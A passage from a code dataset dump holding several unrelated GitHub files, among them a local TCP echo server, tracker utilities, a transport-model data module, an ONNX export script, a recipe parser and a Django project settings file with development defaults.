socket\n\n\ndef mainRun():\n # ทำการทดสอบ program ผ่านเครืองเรา host กำหนดผ่าน host\n host=\"127.0.0.1\" #ip local host\n port=5000\n # สร้าง object ของ socket เพื่อใช้รับส่งข้อมูล\n server=socket.socket()\n # ทำการผูก(bind) object socket ไว้กับ host\n server.bind((host,port))\n # กำหนดจำนวน client\n server.listen(1)\n print(\"Waiting to connect from Client:\")\n\n # สร้าง object 2 ตัว เมื่อมีการเครื่องต่อ (accept) กับ client แล้วจะเก็บค่าไว้ใน object ทั้ง 2\n client,addr=server.accept()\n # print บอก สถานะ\n print(\"Connect From :\"+ str(addr))\n\n\n # กระบวนการรับส่งข้อมูลระหว่างเครื่อง \n while True: # ทำการรับส่งข้อมูลไปเรื่อยๆ\n # ข้อมูลที่รับส่งเป็นข้อมูลแบบ byte\n # รับข้อมูลจาก client\n data=client.recv(1024).decode('utf-8') \n # รับข้อมูล 1024 ตัวอักษร (1024 byte = 1kbyte) # decode แปลง byte เป็น string\n # client ส่งข้อมูลมาจะถูกเก็บไว้ในตัวแปร string\n\n if not data:\n break # ถ้าไม่มี data ให้ออกจาก loop\n \n print(\"Message From Client : \"+data)\n\n # ส่งข้อมูลไปหา Client\n data=str(data.upper()) # ถ้า client ส่งข้อมูลเป็นตัวพิมพ์เล็ก จะแปลงเป็นตัวพิมพ์ใหญ่และส่งไปให้ client\n client.send(data.encode('utf-8')) # ข้อมูลที่ส่งมีการแปลงจาก string เป็น byte\n\n client.close() # สั่ง client ให้ปิด\n\n\n\nif __name__==\"__main__\":\n mainRun()\n","repo_name":"parinyad123/Python-Network","sub_path":"TCP_IP/TCPServer.py","file_name":"TCPServer.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36221402833","text":"import re\nimport random\nfrom roundup.cgi.actions import Action\nfrom roundup.cgi.exceptions import Redirect\n\n\ndef is_history_ok(request):\n user = request.client.userid\n db = request.client.db\n classname = request.classname\n nodeid = request.nodeid\n # restrict display of user history to user itself only\n if classname == 'user':\n return user == nodeid or 'Coordinator' in db.user.get(user, 'roles')\n # currently not used\n return True\n\ndef is_coordinator(request):\n user = request.client.userid\n db = request.client.db\n return 'Coordinator' in db.user.get(user, 'roles')\n\ndef clean_ok_message(ok_message):\n \"\"\"Remove nosy_count and message_count from the ok_message.\"\"\"\n pattern = '\\s*(?:nosy|message)_count,|,\\s*(?:nosy|message)_count(?= edited)'\n return ''.join(re.sub(pattern, '', line) for line in ok_message) + '
    '\n\n\ndef issueid_and_action_from_class(cls):\n \"\"\"\n Return the id of the issue where the msg/file is/was linked\n and if the last \"linking action\" was 'link' or 'unlink'.\n \"\"\"\n last_action = ''\n for entry in cls._klass.history(cls._nodeid):\n if 'unlink' in entry:\n last_unlink = entry\n last_action = 'unlink'\n elif 'link' in entry:\n last_entry = entry\n last_action = 'link'\n if last_action in ('link', 'unlink'):\n # the msg has been unlinked and not linked back\n # the link looks like: ('16', , '4',\n # 'link', ('issue', '1', 'messages'))\n return last_entry[4][1], last_action\n return None, None\n\n\nclass RandomIssueAction(Action):\n def handle(self):\n \"\"\"Redirect to a random open issue.\"\"\"\n issue = self.context['context']\n # use issue._klass to get a list of ids, and not a list of instances\n issue_ids = issue._klass.filter(None, {'status': 1})\n url = self.db.config.TRACKER_WEB + 'issue' + random.choice(issue_ids)\n raise Redirect(url)\n\n\ndef init(instance):\n instance.registerUtil('is_history_ok', is_history_ok)\n instance.registerUtil('is_coordinator', is_coordinator)\n instance.registerUtil('clean_ok_message', clean_ok_message)\n instance.registerUtil('issueid_and_action_from_class',\n issueid_and_action_from_class)\n instance.registerAction('random', RandomIssueAction)\n","repo_name":"rbtcollins/tracker-python-dev","sub_path":"extensions/pydevutils.py","file_name":"pydevutils.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32807620612","text":"\n# 입력값\nn = str(input())\nnum = len(n)\nm = int(n)\n\na = num // 2\nhap_0 = 0\nhap_1 = 0\n\nfor i in range(0, a) :\n hap_0 += int(n[i])\n\nfor j in range(a, num) :\n hap_1 += int(n[j])\n\nif hap_0 == hap_1 :\n print(\"LUCKY\")\nelse :\n print(\"READY\")","repo_name":"uss96/CodingTest","sub_path":"삼전코테/구현/럭키 스트레이트.py","file_name":"럭키 스트레이트.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26026058045","text":"from __future__ import annotations\nimport typing as t\n\nfrom sqlalchemy import delete, select\n\nfrom ..confirmation_token import (\n ConfirmationToken as _ConfirmationToken,\n ConfirmationTokenSerializer as _ConfirmationTokenSerializer,\n TokenProtocol,\n)\nfrom ..decorators import getattr_or_implement\nfrom .session import sqla_session\n\n\n__all__ = (\n 'ConfirmationToken',\n 'ConfirmationTokenSerializer',\n)\n\n\nclass SQLATokenMixin:\n model_class: t.Type[t.Any]\n\n def delete_user_tokens(self, user: t.Any) -> None:\n model = self.get_model_class()\n self.session.execute(\n delete(model).where(model.user == user)\n )\n\n def find_token(self, value: str) -> t.Optional[TokenProtocol]:\n model = self.get_model_class()\n return self.session.scalar(\n select(model).where(model.value == value)\n )\n\n def find_user_tokens(self, user: t.Any) -> t.Sequence[TokenProtocol]:\n model = self.get_model_class()\n return self.session.scalars(\n select(model).where(model.user == user)\n .with_for_update()\n ).all()\n\n @getattr_or_implement\n def get_model_class(self) -> t.Type[t.Any]:\n return self.model_class\n\n def save_token(self, token_dict: t.Dict[str, t.Any]) -> None:\n token = self.get_model_class()(**token_dict)\n self.session.add(token)\n\n @property\n def session(self):\n return sqla_session\n\n\nclass ConfirmationToken(SQLATokenMixin, _ConfirmationToken):\n pass\n\n\nclass ConfirmationTokenSerializer(SQLATokenMixin, _ConfirmationTokenSerializer):\n pass\n","repo_name":"kyzima-spb/flask-useful","sub_path":"src/flask_useful/sqla/confirmation_token.py","file_name":"confirmation_token.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27199505882","text":"import errno\nimport os\nimport pickle\nfrom importlib import import_module\nfrom os import makedirs\nfrom os.path import join\nfrom typing import Dict\n\nimport pandas as pd\nimport pycountry\nimport xarray as xr\nimport yaml\n\nfrom item.common import log, paths\nfrom item.model.common import as_xarray, concat_versions, select, tidy, to_wide\nfrom item.model.dimensions import INDEX, load_template\n\n__all__ = [\n \"concat_versions\",\n \"coverage\",\n \"get_model_info\",\n \"load_model_data\",\n \"load_model_scenarios\",\n \"make_regions_csv\",\n \"make_regions_yaml\",\n \"select\",\n \"squash_scenarios\",\n \"to_wide\",\n]\n\n\n# Versions of the database\nVERSIONS = [1, 2]\n\n# Information about the models\nMODELS: Dict[str, dict] = {}\n\n\ndef coverage(models):\n \"\"\"Display some basic data coverage information.\"\"\"\n\n log(\"Checking data coverage.\\n\")\n\n # Accumulate a list of xr.DataArrays to later concatenate@\n result = []\n\n # Load the list of requested quantities\n qty = load_template(paths[\"model data\"])\n\n # Find True/not-null values and sum to get the number of requested\n # quantities for each variable\n req = qty.notnull().sum([\"Mode\", \"Technology\", \"Fuel\"]).to_array(name=\"Requested\")\n log(\"Quantities requested in reporting template: %d\\n\", req.sum())\n result.append((req, \"Requested\"))\n\n # Iterate through models\n for name in sorted(models.keys()):\n if name == \"itf\" or name == \"exxonmobil\" or name == \"roadmap\":\n # Skip due to a data issue\n continue\n log(\"Loading data for %s\" % name)\n\n # Load model data\n df = pd.read_csv(os.path.join(paths[\"model data\"], \"model\", name, \"data.csv\"))\n log(df.head())\n\n # Convert to an xr.Dataset, then count non-null values. We consider a\n # series populated if it has a data value for *any* scenario, region\n # and year.\n counts = (\n as_xarray(df)\n .notnull()\n .any([\"Scenario\", \"Region\", \"Year\"])\n .sum([\"Mode\", \"Technology\", \"Fuel\"])\n .to_array()\n )\n result.append((counts, name))\n\n # Make two separate lists of the DataArrays and labels\n data, labels = zip(*result)\n\n # Combine to a single Dataset\n df = (\n xr.concat(data, pd.Index(labels, name=\"model\"))\n .fillna(0)\n .to_dataframe()\n .unstack(\"model\")\n )\n\n # Compute some totals\n df.columns = df.columns.droplevel(0)\n df[\"# of models\"] = (df.loc[:, \"bp\":] > 0).sum(axis=\"columns\")\n df.loc[\"Total\", :] = df.sum(axis=\"rows\")\n df = df.astype(int)\n log(df)\n df.to_csv(os.path.join(paths[\"model data\"], \"output\", \"coverage.csv\"))\n\n\ndef get_model_info(name, version):\n load_models_info()\n\n try:\n model_info = MODELS[name]\n if version in model_info[\"versions\"]:\n return model_info\n else:\n raise ValueError(\n \"model '{}' not present in database version {}\".format(name, version)\n )\n except KeyError:\n raise ValueError(f\"Model {repr(name)} not among {MODELS.keys()}\")\n\n\ndef get_model_names(version=VERSIONS[-1]):\n \"\"\"Return the names of all models in *version*.\"\"\"\n load_models_info()\n\n result = []\n for name, info in MODELS.items():\n if version in info[\"versions\"]:\n result.append(name)\n return result\n\n\ndef process_raw(version, models):\n \"\"\"Process raw data submissions.\n\n Data for MODELS are imported from the raw data directory.\n \"\"\"\n # Process arguments\n models = models if len(models) else get_model_names(version)\n\n log(\"Processing raw data for: {}\".format(\" \".join(models)))\n\n class _csv_model:\n def import_data(self, data_path, metadata_path):\n return pd.read_csv(data_path), None\n\n for name in models:\n try:\n info = get_model_info(name, version)\n except KeyError:\n log(\" unknown model '%s', skipping\" % name)\n continue\n\n if info[\"format\"] == \"csv\":\n model = _csv_model()\n elif info[\"format\"] is None:\n log(\" model '{}' needs no import\".format(name))\n continue\n else:\n model = import_module(\"item.model.%s\" % name)\n\n _process_raw(name, model, version, info)\n\n\ndef _process_raw(name, model, version, info):\n log(\"Processing raw data for {}\".format(name))\n # Path to raw data: this hold the contents of the Dropbox folder\n # 'ITEM2/Scenario_data_for_comparison/Data_submission_1/Raw_data'\n raw_data = join(\n paths[\"model raw\"], str(version), \"{}.{}\".format(name, info[\"format\"])\n )\n metadata = join(paths[\"data\"], \"model\", name)\n\n log(\" raw data: {}\\n metadata: {}\".format(raw_data, metadata))\n\n # Load the data\n data, notes = model.import_data(raw_data, metadata)\n\n # Put columns in a canonical order\n data = tidy(data)\n\n # Log some diagnostic information\n iy = list(set(data.columns) - set(INDEX))\n log(\" %d non-zero values beginning %s\", data.loc[:, iy].notnull().sum().sum(), iy)\n\n # Create a subdirectory under item2-data/model, if it does not already\n # exist\n model_dir = join(paths[\"model processed\"], str(version), name)\n makedirs(model_dir, exist_ok=True)\n\n # TODO log the last-changed date of the file used for import, or a\n # checksum\n\n # Write data\n data.to_csv(\n join(paths[\"model processed\"], str(version), \"%s.csv\" % name), index=False\n )\n\n # Write the region list for this model\n pd.Series(data[\"region\"].unique(), name=\"region\").to_csv(\n join(model_dir, \"region.csv\"), index=False\n )\n\n # Write the model comments\n try:\n notes.to_csv(join(model_dir, \"note.csv\"), index=False)\n except AttributeError:\n # notes == None; no comments provided for this data set\n pass\n\n\ndef load_model_data(\n version, skip_cache=False, cache=True, fmt=pd.DataFrame, options=[]\n):\n \"\"\"Load model database\"\"\"\n # Check arguments\n version = int(version)\n\n try:\n path = paths[\"models-%d\" % version]\n except KeyError:\n raise ValueError(\"invalid model database version: %s\" % version)\n\n if fmt not in [pd.DataFrame, xr.DataArray, xr.Dataset]:\n raise ValueError(\"unknown return format: %s\" % fmt)\n\n # Path for cached data\n cache_path = os.path.join(paths[\"cache\"], \"model-%d.pkl\" % version)\n\n data = None\n\n # Read data from cache\n if not skip_cache:\n try:\n with open(cache_path, \"rb\") as f:\n data = pickle.load(f)\n except OSError as e:\n if e.errno == errno.ENOENT: # No such file or directory\n pass\n\n # Read data from file\n if data is None:\n data = tidy(pd.read_csv(path))\n\n # Convert to long format, drop empty rows\n data = pd.melt(data, id_vars=INDEX, var_name=\"year\").dropna(subset=[\"value\"])\n\n # Cache the result\n if cache:\n with open(cache_path, \"wb\") as f:\n pickle.dump(data, f)\n\n # Optional additional processing\n if \"squash scenarios\" in options:\n data = squash_scenarios(data, version)\n options.remove(\"squash scenarios\")\n\n if len(options):\n raise ValueError\n\n if fmt in [xr.Dataset, xr.DataArray]:\n # Convert to an xarray format\n return as_xarray(data, version, fmt)\n else:\n # return as-is\n return data\n\n\ndef load_models_info():\n \"\"\"Load the models metadata into the MODELS global.\"\"\"\n global MODELS\n\n if len(MODELS) > 0:\n # Already loaded\n return\n\n with open(join(paths[\"data\"], \"model\", \"models.yaml\")) as f:\n MODELS = yaml.safe_load(f)\n\n\ndef load_model_regions(name, version):\n \"\"\"Load regions.yaml for model *name* in database *version*.\n\n Returns a dictionary where:\n - Keys are codes or names of model regions.\n - Values are dictionaries with the keys:\n - description (optional): a longer name or description of the region\n - countries: a list of ISO 3166 alpha-3 codes for countries in the\n region.\n \"\"\"\n # IDEA load from either regions-1.yaml or regions-2.yaml\n try:\n get_model_info(name, version)\n except Exception:\n if name.lower() == \"item\":\n # Use an empty path in the join() call below; this causes the\n # overall regions.yaml to be loaded\n name = \"\"\n else:\n raise\n\n with open(join(paths[\"data\"], \"model\", name, \"regions.yaml\")) as f:\n return yaml.safe_load(f)\n\n\ndef load_model_scenarios(name, version):\n \"\"\"Load scenarios.yaml for model *name* in database *version*.\n\n Returns a dictionay where:\n\n - Keys are codes or names of scenarios.\n - Values are dictionaries with the key:\n\n - ``category``: either 'reference' or 'policy'.\n \"\"\"\n # Don't do anything with the return value; just check arguments\n get_model_info(name, version)\n\n with open(join(paths[\"data\"], \"model\", name, \"scenarios.yaml\")) as f:\n return yaml.safe_load(f)[version]\n\n\ndef make_regions_csv(out_file, models=None, compare=None):\n \"\"\"Produce a CSV *out_file* with a country→region map for *models*.\n\n The table is created by parsing the regions.yaml files in the iTEM model\n database metadata. It is indexed by ISO 3166 (alpha-3) codes, and has one\n column for each model in *models* (if no models are specified, all models\n are included).\n\n If *compare* is given, the table has entries only where the generated\n value and\n \"\"\"\n version = VERSIONS[-1] # Version 2 only\n\n models = models or get_model_names(version)\n\n def _load(name):\n def _invert(data):\n result = {}\n for k, v in data.items():\n result.update({c: k for c in v[\"countries\"]})\n return result\n\n return pd.Series(\n _invert(load_model_regions(name, version)),\n name=name if len(name) else \"item\",\n )\n\n result = pd.concat([_load(model) for model in [\"item\"] + models], axis=1)\n\n def _get_name(row):\n error = None\n try:\n name = pycountry.countries.get(alpha_3=row.name).name\n except AttributeError:\n try:\n name = pycountry.historic_countries.get(alpha_3=row.name).name\n error = \"historical\"\n except AttributeError:\n name = \"\"\n error = \"nonexistent\"\n finally:\n print(\n \"{} ISO 3166 code '{}' in models: {}\".format(\n error, row.name, \", \".join(row.dropna().index)\n )\n )\n return name\n\n result[\"name\"] = result.apply(_get_name, axis=1)\n\n if compare is not None:\n other = pd.read_csv(compare)\n other.columns = map(str.lower, other.columns)\n other.set_index(\"iso\", inplace=True)\n other.index = map(str.upper, other.index)\n\n result = result.where(result.ne(other))\n\n with open(out_file, \"w\") as f:\n result.to_csv(f)\n\n\ndef make_regions_yaml(in_file, country, region, out_file):\n \"\"\"Convert a country→region map from CSV *in_file* to YAML *out_file*.\n\n *country* and *region* are columns in *in_file* with country codes and\n region names, respectively.\n \"\"\"\n data = pd.read_csv(in_file)[[region, country]].sort_values([region, country])\n data[country] = data[country].apply(str.upper)\n\n result = {}\n\n for region, group in data.groupby(region):\n result[region] = dict(description=\"\", countries=list(group[country]))\n\n with open(out_file, \"w\") as f:\n yaml.dump(result, f, default_flow_style=False)\n\n\ndef squash_scenarios(data, version):\n \"\"\"Replace the per-model scenario names with scenario categories.\n\n *data* is a pd.DataFrame. *version* is the version of the iTEM model\n database.\n \"\"\"\n # Construct the map from model metadata\n scenarios_map = {}\n for model in get_model_names(version):\n for s, info in load_model_scenarios(model, version).items():\n scenarios_map[s] = info[\"category\"]\n\n return data.replace({\"scenario\": scenarios_map})\n","repo_name":"transportenergy/database","sub_path":"item/model/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12155,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"20500391856","text":"import numpy as np\nimport torch.onnx\nimport subprocess\n\n\n\ndef export_to_ONNX(model):\n # Create model with feature dimension 10\n\n D = r\"MCU_NN.onnx\"\n x =torch.randn(1, 32*32)\n print(x)\n print(x.shape)\n print(\"Output:\")\n print(model.target_net(x,torch.tensor([0])))\n input_names = [ \"image\" ]\n output_names = [ \"action\" ]\n\n torch.onnx.export(model.target_net,\n (x, torch.tensor([0])),\n D,\n export_params=True,\n opset_version=10,\n do_constant_folding=True,\n verbose=True,\n input_names=input_names,\n output_names=output_names)\n\n \"\"\"Converting model using xcube.ai\"\"\"\n # This step requires xcube.ai to be installed\n xcubeai_outdir = \"model\"\n xcubeai_exepath = r\"D:\\\\University\\\\AVG-Önlab\\\\stm32ai-windows-6.0.0\\\\windows\\\\stm32ai.exe\"\n\n args = xcubeai_exepath + \" generate \" + \"-m \" + D + \" -o \" + xcubeai_outdir + \" --type onnx\" + \" --compression 8\" + \" --name simplenn\" + \" --series stm32f7\"\n subprocess.call(args, shell=True)\n\n","repo_name":"istvanaut/TK-MachineLearning","sub_path":"AGVCar/NerualNetworks/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26673064812","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re\nimport readchar\n\nrecipesFile = open('recipes.xml','r')\nrecipesOutput = open('recipes.txt', 'w')\ntitlesOutput = open('titles.txt', 'w')\ningredientsFile = open('ingredients.txt', 'w')\n\nshouldCapture = False\n\nisRecipe = False\nhasIngredients = False\nhasDirections = False\nhasCategory = False\nhasDescription = False\nnumberOfRecipes = 0\nnumberWithCategories = 0\nfractions = {'½': '.5', '⅓':'.334', '⅔':'.667', '¼':'.25', '¾':'.75', '⅕':'.2',\n '⅖':'.4', '⅗':'.6', '⅘':'.8', '⅙':'.167', '⅚':'.834', '⅐':'.143',\n '⅛': '.125', '⅜': '.375', '⅝':'.625', '⅞':'.875', '⅑':'.111',\n '⅒':'.1'}\naddThese = []\ncategories = []\ningredients = set([])\nregex = re.compile('\\[\\[[^a-zA-Z]\\]\\]')\n\nfor line in recipesFile:\n\n text = line.strip()\n\n if '' in text:\n title = text\n title = title.replace('<title>', '')\n title = title.replace('', '')\n if 'Category:' in text:\n hasCategory = True\n if 'Description' in text:\n hasDescription = True\n if re.search(r'[Ii]ngredients', text):\n hasIngredients = True\n shouldCapture = True\n if 'Directions' in text:\n hasDirections = True\n\n if '' in text:\n # May include recipes having hasDescription, hasIngredients,\n # hasDirections, hasCategory\n if hasIngredients and hasDirections:\n \"\"\"for i in range(len(addThese)):\n for key, value in fractions.items():\n if key in addThese[i]:\n addThese[i] = re.sub(key, fractions[key], addThese[i])\"\"\"\n recipesOutput.write(\"==title==\" + '\\n')\n recipesOutput.write(title + '\\n')\n titlesOutput.write(title + '\\n')\n atDirections = False\n for addLine in addThese:\n if not atDirections:\n if re.search(r'[Dd]irections', addLine):\n atDirections = True\n recipesOutput.write(\"==directions==\" + '\\n')\n else:\n \"\"\"findIngs = re.findall(r'\\[\\[[a-z |]+\\]\\]', addLine)\n for w in findIngs:\n ingredients.add(w) \"\"\"# .lower() ?\n if re.search(r'[Ii]ngredients', addLine):\n recipesOutput.write(\"==ingredients==\" + '\\n')\n else:\n recipesOutput.write(addLine.lower().strip() + '\\n')\n else:\n recipesOutput.write(addLine + '\\n')\n recipesOutput.write(text.replace('', '') + '\\n')\n recipesOutput.write('==end==\\n')\n numberOfRecipes += 1\n title = \"\"\n addThese = []\n shouldCapture = False\n hasDescription = False\n hasIngredients = False\n hasDirections = False\n hasCategory = False\n if hasIngredients:\n if \"[[File\" not in text and \"Videos\" not in text:\n text = re.sub(r\"<.*>\", \"\", text)\n text = re.sub(r\"'''\", \"\", text)\n if 'Category:' in text:\n category = re.sub(r'\\[\\[Category:', '', text)\n category = re.sub(r'\\]\\]', '', category)\n categories.append(category.lower())\n if '' in text:\n text = text.replace('', '')\n addThese.append(text)\n\n\n\"\"\"\nprint(\"The number of recipes added was:\", str(numberOfRecipes))\nprint(\"The total number of unique categories:\", len(set(categories)))\nprint(\"Number of ingredients:\", len(ingredients))\n\"\"\"\n\ningredientsList = sorted(list(ingredients))\nnewIngredientsList = []\nfor i in ingredientsList:\n ing = i\n ingredientsFile.write(ing)\n newIngredientsList.append(ing)\n\nrecipesFile.close()\ningredientsFile.close()\nrecipesOutput.close()\ntitlesOutput.close()\n\"\"\"\nrecipeItemsWOIngredient = []\nrecipes = open('recipes.txt', 'r')\n\nisIngredients = False\nfor r in recipes:\n text = r\n text = text.lower()\n if re.search(r'[= ]+[Ii]ngredients[= ]+', text):\n isIngredients = True\n elif re.search(r'[= ]+[Dd]irections[= ]+', text):\n isIngredients = False\n elif re.search(r'[= ]+[Dd]escription[= ]+', text):\n isIngredients = False\n elif isIngredients and re.search('[a-zA-Z]', text):\n for i in range(len(newIngredientsList)):\n if newIngredientsList[i] in text:\n break\n if i == len(newIngredientsList) - 1:\n recipeItemsWOIngredient.append(text)\"\"\"\n\"\"\"\nris = getRecipeItems()\nfor i in range(100):\n print(next(ris))\nrecipes.close()\nprint(sorted(recipeItemsWOIngredient))\nprint(len(recipeItemsWOIngredient))\"\"\"\n# print(len(ingredients))\n","repo_name":"gripitt/recipe","sub_path":"resources/regexParser.py","file_name":"regexParser.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43629899555","text":"from __future__ import absolute_import, unicode_literals\nimport os\n\n# Celery settings\n\nCELERY_BROKER_URL = 'amqp://guest:guest@localhost//'\n\n#: Only add pickle to this list if your broker is secured\n#: from unwanted access (see userguide/security.html)\nCELERY_ACCEPT_CONTENT = ['json']\nCELERY_RESULT_BACKEND = 'db+sqlite:///results.sqlite'\nCELERY_TASK_SERIALIZER = 'json'\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '%!tk$*mhe*8ox(w3l_6a#%oo-8(0onzobuzrzw5^!aos)r=e)y'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = ['127.0.0.1', 'localhost', '*']\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'corsheaders',\n # 'django_celery_results',\n 'rest_framework',\n 'authentication',\n 'user_info',\n 'campus',\n 'channel',\n 'coupon',\n 'course',\n 'order',\n 'project',\n 'student',\n 'log_info',\n 'payment',\n 'record',\n 'student_course',\n 'complain',\n 'message',\n 'common',\n]\n\nMIDDLEWARE = [\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'middleware.auth_middle.AuthMiddleware',\n]\n\nCORS_ORIGIN_ALLOW_ALL = True\n\nCORS_ALLOW_HEADERS = (\n 'x-requested-with',\n 'content-type',\n 'accept',\n 'origin',\n 'authorization',\n 'x-csrftoken'\n)\n\nROOT_URLCONF = 'StudentManageSys.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',\n 'PAGE_SIZE': 15,\n 'DEFAULT_FILTER_BACKENDS': ('rest_framework.filters.DjangoFilterBackend', 'rest_framework.filters.SearchFilter'),\n 'DEFAULT_RENDERER_CLASSES': (\n 'utils.renderers.CustomJsonRender',\n 'rest_framework.renderers.BrowsableAPIRenderer',\n ),\n 'TEST_REQUEST_DEFAULT_FORMAT': 'json',\n 'EXCEPTION_HANDLER': 'utils.handlers.exception_handler'\n}\n\nWSGI_APPLICATION = 'StudentManageSys.wsgi.application'\n\nLOG_ROOT = os.path.join(BASE_DIR, 'logs')\nif not os.path.isdir(LOG_ROOT):\n os.makedirs(LOG_ROOT)\n\n# 日志系统\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n 'format': '%(asctime)s [%(threadName)s:%(thread)d] [%(name)s:%(lineno)d] [%(levelname)s]- %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(asctime)s %(message)s'\n }\n },\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.TimedRotatingFileHandler',\n 'filename': '%s/log.log' % LOG_ROOT,\n 'formatter': 'simple'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'default',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': 'INFO',\n 'propagate': False\n },\n 'django.request': {\n 'handlers': ['console'],\n 'level': 'INFO',\n 'propagate': False\n },\n 'django.db': {\n 'handlers': ['console'],\n 'propagate': False,\n 'level': 'DEBUG',\n }\n }\n}\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'student_manage_sys',\n 'USER': 'root',\n 'PASSWORD': '123456',\n 'HOST': 'localhost',\n 'PORT': 3306,\n 'CHARSET': 'UTF-8',\n 'ATOMIC_REQUESTS': True,\n 'OPTIONS': {'charset': 'utf8mb4'},\n }\n}\n\n# Password validation\n# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = False\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.11/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\n# 系统启动默认创建media文件夹\nif not os.path.exists(MEDIA_ROOT):\n os.mkdir(MEDIA_ROOT)\n# 系统启动默认创建media/channel文件夹存放渠道二维码\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'channel')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'channel'))\n# 系统启动默认创建media/agreement文件夹存放学生电子协议图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'agreement')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'agreement'))\n# 系统启动默认创建media/transcript文件夹存放学生成绩单\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'transcript')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'transcript'))\n# 系统启动默认创建media/IDcard1文件夹存放学生身份证图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'IDcard1')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'IDcard1'))\n# 系统启动默认创建media/IDcard2文件夹存放学生身份证图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'IDcard2')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'IDcard2'))\n# 系统启动默认创建media/IDcard1文件夹存放学生订单支付信息图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'order')):\n os.mkdir(os.path.join(MEDIA_ROOT, 'order'))\n# 系统启动默认创建media/images/user_qrcode文件夹存放系统用户二维码\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'images/user_qrcode')):\n os.makedirs(os.path.join(MEDIA_ROOT, 'images/user_qrcode'))\n# 系统启动默认创建media/images/certificate文件夹存放系统审课图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'images/certificate')):\n os.makedirs(os.path.join(MEDIA_ROOT, 'images/certificate'))\n# 系统启动默认创建media/images/convert文件夹存放系统审课图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'images/convert')):\n os.makedirs(os.path.join(MEDIA_ROOT, 'images/convert'))\n# 系统启动默认创建media/images/complain文件夹存放用户投诉图片\nif not os.path.exists(os.path.join(MEDIA_ROOT, 'images/complain')):\n os.makedirs(os.path.join(MEDIA_ROOT, 'images/complain'))\n\n# redis 配置\nREDIS_CONFIG = {\n 'host': 'localhost',\n 'port': 6379\n}\n# elastic-search 